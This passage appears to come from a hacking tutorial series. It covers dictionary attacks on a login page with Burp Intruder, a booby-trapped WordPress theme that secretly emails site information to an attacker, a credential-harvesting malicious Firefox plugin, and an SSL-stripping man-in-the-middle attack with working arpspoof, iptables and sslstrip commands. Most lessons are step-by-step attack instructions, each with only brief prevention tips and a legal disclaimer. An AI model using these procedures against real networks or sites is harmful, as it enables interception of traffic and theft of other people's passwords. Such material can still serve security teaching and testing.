Burp Suite is an integrated platform for performing security testing of web applications. Its various
tools work seamlessly together to support the entire testing process, from initial mapping and
analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art
automation, to make your work faster, more effective, and more fun.
Explanation about HTTP basic authentication.
HTTP supports several authentication mechanisms. Upon a request for resource within a protected
space the server should respond with authentication challenge using WWW-Authenticate header. In
order to receive authorization the client should send requested identification information using
Authorization header. When the client is not authorised a 401 “Unauthorised” response status is
returned.
The simplest and most common HTTP authentication in use is Basic. The clients need to provide the
credentials in a Base64 encoded string username:password. If the credentials are correct
the web server returns the requested resource otherwise the server repeats the authentication
challenge.
Requirements:
1. Download BURP suite at portswigger.net (in this tutorial I use the free edition) and install it.
2. Compose a basic PHP login script to use on the victim machine.
Hacking HTTP Basic Authentication Dictionary Attacks with Burp
Suite Free:
1. The PHP script on requirement number 2 is a simple log in page. You can copy it to your
HTDOCS folder if you use XAMPP or WAMP for your web development platform. .
2. Run your BURP suite and change your browser proxy setting to run through BURP application.
By default BURP will use port 8080, if you don't know how to change the browser proxy settings, a
simple google search can tell you how.
3. When proxy already set up, now we can access the login.php file. In this example, for testing
purpose, I will input username = test and password = test. When we click the submit button(LOG
IN), BURP will intercept the data.
Right click and choose "Send to Intruder".
4. On INTRUDER –> POSITIONS tab, change the attack type to "Cluster Bomb".
5. After finished setting up the attack type, we can move to PAYLOADS tab. To fill this PAYLOADS,
see the picture on step 4
Payload set 1 = PHPSESSID (the value)
we will set up the same PHP SESSID value, because the system uses a static PHPSESSID.
6. Now we will change the payload set number two, we're still on PAYLOADS TAB.
Payload set 2 = username (the value)
you can load the username data from username list. I input the username one by one.
7. On payload number three we will input the password.
Payload set 3 = password (the value)
on this step you also can load from a password list, but in above example I input the passwrd one
by one.
8. The last PAYLOADS to set up is the submit parameter.
Payload set 4 = submit (the value)
since this submit is to check whether user click the button or not, we can make it the same value
LOG+IN%21.
9. Every PAYLOADS has been set up successfully, now we will start the attack and
watch BURP suite perform the attack automatically. Click Intruder and choose "Start Attack".
10. BURP suite itruder will check the username and password one by one. When there's
matching username and password, you can view the length was changed. From this example we
know that the username = admin and password = 123456
Conclusion:
1. To prevent this kind of attack, as a user you can do nothing, as developer you can do like GMail
anti brute force system where every trying is logged by the system based on their IP address. If you
try to log in and failed for several times, the system will force the user to solve the captcha.
2. As a developer you can do add the salt into username and password to make attack time much
longer since you've added the salt, but in my opinion the first conclusion was better.
Lesson 27: Hacking Wordpress – Send Secret emails
from malicious layout codes about site info.
oday title is Hacking WordPress: Send Email Secretly About Website Information.
Requirements:
1. Understand PHP,
2. Know wordpress function,
3. Script to send email secretly (ask for script when ready).
Step by step Hacking WordPress: Send Email Secretly About Website
Information:
1. We want to know about the wordpress user information of a user. Let see the following script:
2. The script on step one if executed will show the details of active wordpress user (logged
in). execute this script on your local wordpress server, here is what I got:
Username: victim
Password: $P$BtwjqOL0j8USlI4htLLp0wnmizvaEB
User email: [email protected]
User first name:
User last name:
User display name: victim
User ID: 1
3. Even we know the username and password hash, but we still need time to crack
the password hash to get the plain password from the user.
On our last hacking tutorial about WordPress hacking tutorials to add administrator user secretly,
we can add administrator secretly by spreading the malicious themes, but the problem is: "how do
we know who already download the malicious wordpress themes?"
4. From the problem in step three, we will use the method to combine this tutorial WordPress
hacking tutorials to add administrator user secretly and send the URL address of the
infected website by inserting the following script.
5. When saw this email address, it's way too plain how if we encode it using base64_encode
PHP function, and here is the result.
6. The script I provide you will send email secretly to the attacker containing
the wordpress URL when victim logs in and browses his/her wordpress website.
Conclusion:
1. Download the wordpress themes only from the trusted source.
2. Buying usually better than "free download"
3. Usually this kind of attack you can find on a premium wordpress themes (nulled edition or
warez), make sure you check the source code one by one the themes to minimize the attack.
you can give a try to find the strings below in your themes code (especially the nulled and warez
edition) to check whether it has a malicious code or not.
base64_encode (most attackers use base64 encoding)
http:// (check the URL that going somewhere),
Lesson 28: Reveal Asterisk Saved Passwords
We will learn how to reveal the asterisk on Mozilla Firefox and Google Chrome without seeing the
saved password from the browser options menu.
If you still never heared about Firebug, here is the description from wikipedia:
Firebug is a web development tool that facilitates the debugging, editing, and monitoring of
any website's CSS, HTML, DOM, XHR, and JavaScript; it also provides other web development
tools.[2] Firebug's JavaScript panel can log errors, profile function calls, and enable the developer to
run arbitrary JavaScript. Its net panel can monitor URLs that the browser requests, such as
external CSS, JavaScript, and image files. The net panel can display both request headers and
response headers for each page asset; it can also estimate the time each asset took to load.
Requirements:
1. Mozilla firefox with firebug addons.
2. Google chrome.
Step by step to Reveal Asterisk Saved Passwords on Mozilla
Firefox and Chrome:
1. Open our Mozilla Firefox browser,
press ALT –> click Tools –> Click Add-ons
2. On Add-ons page, there is a search box, type firebug on the textbox and click search, or you
can go directly to this page https://addons.mozilla.org/en-US/firefox/addon/firebug/.
Click install if there is a pop out window asking you to install this add ons.
and restart your browser.
3. This is the firebug button. to activate firebug you only need to click this button and click once
again to deactivate.
4. Now we try to open a website with log in page, e.g: mail.live.com and input the password. Right
click on the password box and choose Inspect Element.
5. Double click the type="password" and change it into type="text".
6. The asterisk password will be shown and revealed
7. What if it is on Google Chrome browser? The steps is the same.
Open the log in page, right click the password box and choose inspect element
8. Change the input type="password" to type="text".
The password is revealed.
Lesson 29: Hacking Internet User’s Passwords Using
‘Malicious’ Firefox Plugin.
The title Hacking Internet Users Password Using Malicious Firefox Plugin has come after some
students asked about the possibility to gather username and password from browser plugin.
The answer is yes you can gather a username and password from internet users when they
installed a malicious plugin.
According to wikipedia a plugin is
In computing, a plug-in (or plugin, extension) is a software component that adds a specific feature to
an existing software application. When an application supports plug-ins, it enables customization.
The common examples are the plug-ins used in web browsers to add new features such as searchengines, virus scanners, or the ability to utilize a new file type such as a new video format.
in this Hacking Internet Users Password Using Malicious Firefox Plugin case, the attacker will
change or add or modify or create the main function of a firefox plugin and override or rewrite some
function to do some malicious activities with benefit for the attacker.
Requirements:
1. Firefox malicious plugin
2. Understand Javascript
3. Social Engineering
How to Hacking Internet Users Password Using Malicious Firefox
Plugin:
The victim browser, which has a malicious Firefox plugin installed, is accessing the internet. As
victim browses the internet, the infected browser will also send the data to the attacker server.
The data is which website victim visited, and send the username and password as well.
the attacker harvester website will grab all GET or POST method and store it in a simple TXT file,
but it can change to other database server as well.
Conclusion:
1. Make sure you download the plugin only from trusted source (e.g: http://addons.mozilla.org/).
Lesson 30: Breaking SSL Encryption
Level : Medium, Advanced
Some people ask "Are you sure SSL(Secure Socket Layer) port 443 can be hacked and we know
the password sent over the network??"…..how to break ssl protection using sslstrip?
What is SSL?
actually if you see my explanation about SSL in my previous post, when we try to break
the encryption it’s a little bit hard to break, but here in this tutorial I will explain how to break
the SSL encryption without breaking the SSL encryption using Man in the Middle Attack :-).
Man in the Middle Attack
Requirement :
1. KALI LINUX
2. Arpspoof
3. IPTables
4. SSLStrip
5. NetStat
SSLSTRIP may need to be downloaded and installed.
Perform the Attack – Man in the Middle Attack
1. Set your Linux box to make it can forward every incoming port(enable port forwarding).
echo ’1’ > /proc/sys/net/ipv4/ip_forward
This code will let your Linux Backtrack have ability to forward every packet that was not intended for
your machine.
2. Know your network gateway
netstat -nr
For example i’ve already know that my gateway address is 192.168.8.8
3. Use ARP spoof to perform Man in the Middle Attack
arpspoof -i eth0 192.168.8.8
a. Change "eth0" to your network card that currently connected to the network. Usually it
is eth0 or wlan0.
b. Change "192.168.8.8" to your network default gateway.
c. In this tutorial I use arpspoof to entire network. Be careful if your network has a large userbase
connected to it, because it will crash your network and bring your network down.
SSL Strip
Created by Moxie Morlinspike who provides a demonstration of the HTTPS stripping attacks that
presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch
for HTTPS links and redirects, then map those links into either look-alike HTTP links or homographsimilar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon,
selective logging, and session denial. -Taken from author websiteThis all happens on the fly, and is practically will invisible to users. The only way to notice is by
checking the URL in the address bar where normally it would display HTTPS, it will now
display HTTP instead.
Install SSL Strip (optional)
1. Download SSL Strip
2. tar zxvf sslstrip-0.9.tar.gz
3. cd sslstrip-0.9
4. python setup.py install
Break SSL Protection Using SSLStrip and Kali Linux
1. We need to set up a firewall rule (using iptables) to redirect requests from port 80 to port 8080 to
ensure our outgoing connections (from SSL Strip) get routed to the proper port.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --toport 8080
2. After finished set up iptables, the next step we need to redirect all network HTTP traffic through
our computer using ARPSpoof (don’t forget to enable IP forwarding)
echo ’1’ > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 192.168.8.8
3. When everything running well, you will see that ARPSpoof capturing network traffic, then the next
step you need to start your SSL Strip by opening new terminal(CTRL+ALT+T)
sslstrip -l 8080
"-l" tells the system to listen on specified port.
SSL Strip is already running and waiting for victim opening SSL URL such as
(https://mail.google.com; https://mail.yahoo.com; etc)
As a victim I will try to open https://mail.live.com. When I open the page, I expect the url to
no longer be in secure socket layer.
The URL changed into HTTP.
4. After SSL Strip capturing enough data, to stop ARPSpoof and SSL Strip just hit CTRL + C. After
you stop it, the whole network will be down and cannot be accessed for a while(it shouldn’t take
long time), this can happen because ARPSpoof didn’t automatically repopulate the ARP tables with
router proper MAC address.
5. Inside the SSL Strip folder there will be a new file created "sslstrip.log" that stores all
information that already captured over the HTTP protocol and even the HTTPS. Just take a look to
the file using your favorite text editor. Below picture is the content of my sslstrip.log :that
already captured victim data when they open https://mail.live.com.
You can see the plain data of username and password there in the log.
Prevention of SSL Strip Attack
1. If you are on public network (internet cafe, unsecured hotspot, etc) minimalize login into your
personal account.
2. Use SSH Tunneling
3. Keep your eyes open.
Remember This !
Don't use this for anything other than educational purposes or on a server with permission from a
client. Don’t get shocked if this application will insure you go to jail faster if you use for an unintended
purpose by law.